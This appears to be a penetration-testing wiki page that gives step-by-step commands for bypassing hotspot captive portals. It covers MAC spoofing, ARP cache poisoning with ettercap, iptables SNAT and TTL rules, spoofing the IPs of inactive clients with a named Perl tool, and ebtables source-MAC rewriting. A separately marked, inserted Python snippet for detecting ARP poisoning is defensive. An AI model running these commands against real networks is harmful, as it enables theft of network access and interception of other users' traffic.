
04. Hotspot Captive Portal Bypass

Koutto edited this page Nov 1, 2020 · 1 revision

MAC based authorization

  1. Sniff the network to find an authorized client, identified by its MAC address.
  2. Change the interface MAC address:

```sh
ifconfig wlan0 hw ether <authorized_MAC_address>
```

IP based authorization

Method 1: MiTM

  1. Activate IP forwarding:

```sh
echo 1 > /proc/sys/net/ipv4/ip_forward
```

  2. MiTM (ARP cache poisoning) between the gateway and the authorized client:

```sh
ettercap -T -q -i wlan0 -w dump -M ARP /<IP_authorized_client>/ /<IP_gateway>/
```

  3. All packets sent from the attacker will have to spoof the authorized client IP, except packets going to the LAN (negation goes before the match in current iptables syntax):

```sh
iptables -t nat -A OUTPUT ! -d <LAN> -j SNAT --to <IP_authorized_client>
```

  4. Increment the TTL of forwarded packets:

```sh
iptables -t mangle -A FORWARD -d <IP_authorized_client> -j TTL --ttl-inc 1
```
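Added example (not part of this wiki): from the hotspot operator's side, the ARP cache poisoning in step 2 shows up as one MAC answering for both the gateway and the authorized client. This Python sketch applies that check to a constructed list of ARP replies; the gateway address and all MACs are made up.

```python
"""Detect the ARP cache poisoning pattern from a stream of (sender_ip, sender_mac)
pairs as they would be extracted from ARP replies seen on the hotspot LAN.
Constructed example; not part of the original wiki."""
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"  # assumed gateway address of the constructed LAN


def detect_arp_poisoning(arp_replies, gateway_ip=GATEWAY_IP):
    """Return a list of alert strings, in the order the evidence appears.

    Rule 1: an IP already bound to one MAC suddenly claims a different MAC.
    Rule 2: one MAC answers for several IPs and one of them is the gateway,
            which is what a client<->gateway ARP MiTM looks like on the wire.
    Caveat: a router legitimately holding several IPs also matches rule 2,
            so whitelist known multi-homed hosts before paging on it.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in arp_replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"rebind {ip}: {previous} -> {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        claimed = mac_to_ips[mac]
        if len(claimed) > 1 and gateway_ip in claimed:
            others = ",".join(sorted(claimed - {gateway_ip}))
            alerts.append(f"mitm {mac} claims gateway {gateway_ip} and {others}")
    return alerts


# Constructed ARP reply sequence: legitimate bindings first, then a third MAC
# (aa:bb:cc:dd:ee:ff) answering for both the authorized client and the gateway.
SAMPLE_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:55"),   # real gateway
    ("192.168.1.20", "66:77:88:99:aa:bb"),  # authorized client
    ("192.168.1.30", "aa:bb:cc:dd:ee:ff"),  # third station, its own address
    ("192.168.1.20", "aa:bb:cc:dd:ee:ff"),  # poisoned: client now "at" third MAC
    ("192.168.1.1", "aa:bb:cc:dd:ee:ff"),   # poisoned: gateway now "at" third MAC
]

if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES):
        print(alert)
```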

Method 2: Inactive users

Spoof the IP address of an authorized client that has become inactive on the hotspot (tool: https://github.com/codewatchorg/cpscam):

```sh
perl cpscam.pl <interface> <ListenIP> <SubnetMask> <InactivityTimeout> <CaptiveLogoffURL>
```

IP+MAC based authorization

  1. Turn the interface into bridge mode:

```sh
modprobe bridge
brctl addbr br0
brctl addif br0 <interface>
```

  2. All frames sent by the attacker to the gateway get a spoofed source MAC address:

```sh
ebtables -t nat -A POSTROUTING -o <interface> -d <MAC_gateway> -j snat --to-source <MAC_authorized_client>
```

  3. Apply the IP based authorization bypass, Method 1 (MiTM), described above.